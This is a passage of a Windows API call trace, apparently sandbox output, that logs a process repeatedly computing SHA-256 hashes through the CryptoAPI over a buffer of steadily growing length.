	[0207.804] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26ccaf8
	[0207.804] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x2, pbData=0x26ccaf8, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x26ccaf8, pdwDataLen=0x129364) returned 1
	[0207.804] CryptDestroyHash (hHash=0x22b6c00) returned 1
	[0207.804] CryptReleaseContext (hProv=0x2258e0, dwFlags=0x0) returned 1
	[0207.804] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x2258e0) returned 1
	[0207.805] CryptCreateHash (in: hProv=0x2258e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0207.805] CryptHashData (hHash=0x22b6840, pbData=0x275fc38, dwDataLen=0x3a0, dwFlags=0x0) returned 1
	[0207.805] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0207.805] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26ccb20
	[0207.805] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x26ccb20, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x26ccb20, pdwDataLen=0x129364) returned 1
	[0207.805] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0207.805] CryptReleaseContext (hProv=0x2258e0, dwFlags=0x0) returned 1
	[0207.805] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x2258e0) returned 1
	[0207.805] CryptCreateHash (in: hProv=0x2258e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0207.805] CryptHashData (hHash=0x22b6c00, pbData=0x275fc38, dwDataLen=0x3c0, dwFlags=0x0) returned 1
	[0207.805] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0207.805] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26ccb48
	[0207.805] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x2, pbData=0x26ccb48, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x26ccb48, pdwDataLen=0x129364) returned 1
	[0207.806] CryptDestroyHash (hHash=0x22b6c00) returned 1
	[0207.806] CryptReleaseContext (hProv=0x2258e0, dwFlags=0x0) returned 1
	[0207.806] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x2258e0) returned 1
	[0207.806] CryptCreateHash (in: hProv=0x2258e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0207.806] CryptHashData (hHash=0x22b6840, pbData=0x275fc38, dwDataLen=0x3e0, dwFlags=0x0) returned 1
	[0207.806] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0207.806] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26ccb70
	[0207.806] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x26ccb70, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x26ccb70, pdwDataLen=0x129364) returned 1
	[0207.806] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0207.806] CryptReleaseContext (hProv=0x2258e0, dwFlags=0x0) returned 1
	[0207.806] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x2258e0) returned 1
	[0207.806] CryptCreateHash (in: hProv=0x2258e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0207.806] CryptHashData (hHash=0x22b6c00, pbData=0x275fc38, dwDataLen=0x400, dwFlags=0x0) returned 1
	[0207.806] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0207.807] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26ccb98
	[0207.807] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x2, pbData=0x26ccb98, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x26ccb98, pdwDataLen=0x129364) returned 1
	[0207.807] CryptDestroyHash (hHash=0x22b6c00) returned 1
	[0207.807] CryptReleaseContext (hProv=0x2258e0, dwFlags=0x0) returned 1
	[0207.807] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x2258e0) returned 1
	[0207.807] CryptCreateHash (in: hProv=0x2258e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0207.807] CryptHashData (hHash=0x22b6840, pbData=0x275fc38, dwDataLen=0x420, dwFlags=0x0) returned 1
	[0207.807] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0207.807] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26ccbc0
	[0207.807] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x26ccbc0, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x26ccbc0, pdwDataLen=0x129364) returned 1
	[0207.807] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0207.807] CryptReleaseContext (hProv=0x2258e0, dwFlags=0x0) returned 1
	[0207.807] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x2258e0) returned 1
	[0207.807] CryptCreateHash (in: hProv=0x2258e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0207.807] CryptHashData (hHash=0x22b6c00, pbData=0x275fc38, dwDataLen=0x440, dwFlags=0x0) returned 1
	[0207.808] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0207.808] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26ccbe8
	[0207.808] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x2, pbData=0x26ccbe8, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x26ccbe8, pdwDataLen=0x129364) returned 1
	[0207.808] CryptDestroyHash (hHash=0x22b6c00) returned 1
	[0207.808] CryptReleaseContext (hProv=0x2258e0, dwFlags=0x0) returned 1
	[0207.808] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x2258e0) returned 1
	[0207.808] CryptCreateHash (in: hProv=0x2258e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0207.808] CryptHashData (hHash=0x22b6840, pbData=0x275fc38, dwDataLen=0x460, dwFlags=0x0) returned 1
	[0207.808] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0207.808] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26ccc10
	[0207.808] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x26ccc10, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x26ccc10, pdwDataLen=0x129364) returned 1
	[0207.808] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0207.808] CryptReleaseContext (hProv=0x2258e0, dwFlags=0x0) returned 1
	[0207.808] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x2258e0) returned 1
	[0207.809] CryptCreateHash (in: hProv=0x2258e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0207.809] CryptHashData (hHash=0x22b6c00, pbData=0x275fc38, dwDataLen=0x480, dwFlags=0x0) returned 1
	[0207.809] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0207.809] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26933a0
	[0207.809] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x2, pbData=0x26933a0, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x26933a0, pdwDataLen=0x129364) returned 1
	[0207.809] CryptDestroyHash (hHash=0x22b6c00) returned 1
	[0207.809] CryptReleaseContext (hProv=0x2258e0, dwFlags=0x0) returned 1
	[0207.809] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x2258e0) returned 1
	[0207.809] CryptCreateHash (in: hProv=0x2258e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0207.810] CryptHashData (hHash=0x22b6840, pbData=0x275fc38, dwDataLen=0x4a0, dwFlags=0x0) returned 1
	[0207.810] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0207.810] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2691a78
	[0207.810] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x2691a78, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x2691a78, pdwDataLen=0x129364) returned 1
	[0207.810] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0207.810] CryptReleaseContext (hProv=0x2258e0, dwFlags=0x0) returned 1
	[0207.810] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x2258e0) returned 1
	[0207.810] CryptCreateHash (in: hProv=0x2258e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0207.810] CryptHashData (hHash=0x22b6c00, pbData=0x275fc38, dwDataLen=0x4c0, dwFlags=0x0) returned 1
	[0207.810] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0207.810] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2693328
	[0207.810] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x2, pbData=0x2693328, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x2693328, pdwDataLen=0x129364) returned 1
	[0207.810] CryptDestroyHash (hHash=0x22b6c00) returned 1
	[0207.810] CryptReleaseContext (hProv=0x2258e0, dwFlags=0x0) returned 1
	[0207.810] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x2258e0) returned 1
	[0207.811] CryptCreateHash (in: hProv=0x2258e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0207.811] CryptHashData (hHash=0x22b6840, pbData=0x275fc38, dwDataLen=0x4e0, dwFlags=0x0) returned 1
	[0207.811] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0207.811] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26933c8
	[0207.811] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x26933c8, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x26933c8, pdwDataLen=0x129364) returned 1
	[0207.811] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0207.811] CryptReleaseContext (hProv=0x2258e0, dwFlags=0x0) returned 1
	[0207.811] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x2258e0) returned 1
	[0207.811] CryptCreateHash (in: hProv=0x2258e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0207.811] CryptHashData (hHash=0x22b6c00, pbData=0x275fc38, dwDataLen=0x500, dwFlags=0x0) returned 1
	[0207.811] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0207.811] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2692e78
	[0207.811] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x2, pbData=0x2692e78, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x2692e78, pdwDataLen=0x129364) returned 1
	[0207.811] CryptDestroyHash (hHash=0x22b6c00) returned 1
	[0207.811] CryptReleaseContext (hProv=0x2258e0, dwFlags=0x0) returned 1
	[0207.811] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x2258e0) returned 1
	[0207.812] CryptCreateHash (in: hProv=0x2258e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0207.812] CryptHashData (hHash=0x22b6840, pbData=0x275fc38, dwDataLen=0x520, dwFlags=0x0) returned 1
	[0207.812] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0207.812] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x23064d8
	[0207.812] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x23064d8, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x23064d8, pdwDataLen=0x129364) returned 1
	[0207.812] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0207.812] CryptReleaseContext (hProv=0x2258e0, dwFlags=0x0) returned 1
	[0207.812] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x2258e0) returned 1
	[0207.812] CryptCreateHash (in: hProv=0x2258e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0207.812] CryptHashData (hHash=0x22b6c00, pbData=0x275fc38, dwDataLen=0x540, dwFlags=0x0) returned 1
	[0207.812] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0207.812] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2306578
	[0207.813] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x2, pbData=0x2306578, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x2306578, pdwDataLen=0x129364) returned 1
	[0207.813] CryptDestroyHash (hHash=0x22b6c00) returned 1
	[0207.813] CryptReleaseContext (hProv=0x2258e0, dwFlags=0x0) returned 1
	[0207.813] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x2258e0) returned 1
	[0207.813] CryptCreateHash (in: hProv=0x2258e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0207.813] CryptHashData (hHash=0x22b6840, pbData=0x275fc38, dwDataLen=0x560, dwFlags=0x0) returned 1
	[0207.813] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0207.813] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2306618
	[0207.813] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x2306618, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x2306618, pdwDataLen=0x129364) returned 1
	[0207.813] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0207.813] CryptReleaseContext (hProv=0x2258e0, dwFlags=0x0) returned 1
	[0207.813] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x2258e0) returned 1
	[0207.813] CryptCreateHash (in: hProv=0x2258e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0207.813] CryptHashData (hHash=0x22b6c00, pbData=0x275fc38, dwDataLen=0x580, dwFlags=0x0) returned 1
	[0207.813] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0207.813] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2637f8
	[0207.814] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x2, pbData=0x2637f8, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x2637f8, pdwDataLen=0x129364) returned 1
	[0207.814] CryptDestroyHash (hHash=0x22b6c00) returned 1
	[0207.814] CryptReleaseContext (hProv=0x2258e0, dwFlags=0x0) returned 1
	[0207.814] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x2258e0) returned 1
	[0207.814] CryptCreateHash (in: hProv=0x2258e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0207.814] CryptHashData (hHash=0x22b6840, pbData=0x275fc38, dwDataLen=0x5a0, dwFlags=0x0) returned 1
	[0207.814] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0207.814] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230af40
	[0207.814] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x230af40, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x230af40, pdwDataLen=0x129364) returned 1
	[0207.814] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0207.814] CryptReleaseContext (hProv=0x2258e0, dwFlags=0x0) returned 1
	[0207.814] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x2258e0) returned 1
	[0207.814] CryptCreateHash (in: hProv=0x2258e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0207.814] CryptHashData (hHash=0x22b6c00, pbData=0x275fc38, dwDataLen=0x5c0, dwFlags=0x0) returned 1
	[0207.814] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0207.814] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2307de8
	[0207.814] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x2, pbData=0x2307de8, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x2307de8, pdwDataLen=0x129364) returned 1
	[0207.815] CryptDestroyHash (hHash=0x22b6c00) returned 1
	[0207.815] CryptReleaseContext (hProv=0x2258e0, dwFlags=0x0) returned 1
	[0207.815] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x2258e0) returned 1
	[0207.815] CryptCreateHash (in: hProv=0x2258e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0207.815] CryptHashData (hHash=0x22b6840, pbData=0x275fc38, dwDataLen=0x5e0, dwFlags=0x0) returned 1
	[0207.815] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0207.815] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26b0520
	[0207.815] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x26b0520, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x26b0520, pdwDataLen=0x129364) returned 1
	[0207.815] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0207.815] CryptReleaseContext (hProv=0x2258e0, dwFlags=0x0) returned 1
	[0207.815] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x2258e0) returned 1
	[0207.816] CryptCreateHash (in: hProv=0x2258e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0207.816] CryptHashData (hHash=0x22b6c00, pbData=0x275fc38, dwDataLen=0x600, dwFlags=0x0) returned 1
	[0207.816] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0207.816] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26b0548
	[0207.816] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x2, pbData=0x26b0548, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x26b0548, pdwDataLen=0x129364) returned 1
	[0207.816] CryptDestroyHash (hHash=0x22b6c00) returned 1
	[0207.816] CryptReleaseContext (hProv=0x2258e0, dwFlags=0x0) returned 1
	[0207.816] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x2258e0) returned 1
	[0207.816] CryptCreateHash (in: hProv=0x2258e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0207.816] CryptHashData (hHash=0x22b6840, pbData=0x275fc38, dwDataLen=0x620, dwFlags=0x0) returned 1
	[0207.816] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0207.816] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26b0570
	[0207.816] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x26b0570, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x26b0570, pdwDataLen=0x129364) returned 1
	[0207.816] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0207.816] CryptReleaseContext (hProv=0x2258e0, dwFlags=0x0) returned 1
	[0207.816] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x2258e0) returned 1
	[0207.816] CryptCreateHash (in: hProv=0x2258e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0207.817] CryptHashData (hHash=0x22b6c00, pbData=0x275fc38, dwDataLen=0x640, dwFlags=0x0) returned 1
	[0207.817] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0207.817] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26b0598
	[0207.817] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x2, pbData=0x26b0598, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x26b0598, pdwDataLen=0x129364) returned 1
	[0207.817] CryptDestroyHash (hHash=0x22b6c00) returned 1
	[0207.817] CryptReleaseContext (hProv=0x2258e0, dwFlags=0x0) returned 1
	[0207.817] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x2258e0) returned 1
	[0207.817] CryptCreateHash (in: hProv=0x2258e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0207.817] CryptHashData (hHash=0x22b6840, pbData=0x275fc38, dwDataLen=0x660, dwFlags=0x0) returned 1
	[0207.817] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0207.817] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26b05c0
	[0207.817] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x26b05c0, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x26b05c0, pdwDataLen=0x129364) returned 1
	[0207.817] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0207.817] CryptReleaseContext (hProv=0x2258e0, dwFlags=0x0) returned 1
	[0207.817] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x2258e0) returned 1
	[0207.818] CryptCreateHash (in: hProv=0x2258e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0207.818] CryptHashData (hHash=0x22b6c00, pbData=0x275fc38, dwDataLen=0x680, dwFlags=0x0) returned 1
	[0207.818] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0207.818] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26b05e8
	[0207.818] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x2, pbData=0x26b05e8, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x26b05e8, pdwDataLen=0x129364) returned 1
	[0207.818] CryptDestroyHash (hHash=0x22b6c00) returned 1
	[0207.818] CryptReleaseContext (hProv=0x2258e0, dwFlags=0x0) returned 1
	[0207.818] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x2258e0) returned 1
	[0207.818] CryptCreateHash (in: hProv=0x2258e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0207.818] CryptHashData (hHash=0x22b6840, pbData=0x275fc38, dwDataLen=0x6a0, dwFlags=0x0) returned 1
	[0207.818] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0207.818] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26b0610
	[0207.818] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x26b0610, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x26b0610, pdwDataLen=0x129364) returned 1
	[0207.818] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0207.818] CryptReleaseContext (hProv=0x2258e0, dwFlags=0x0) returned 1
	[0207.818] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x2258e0) returned 1
	[0207.819] CryptCreateHash (in: hProv=0x2258e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
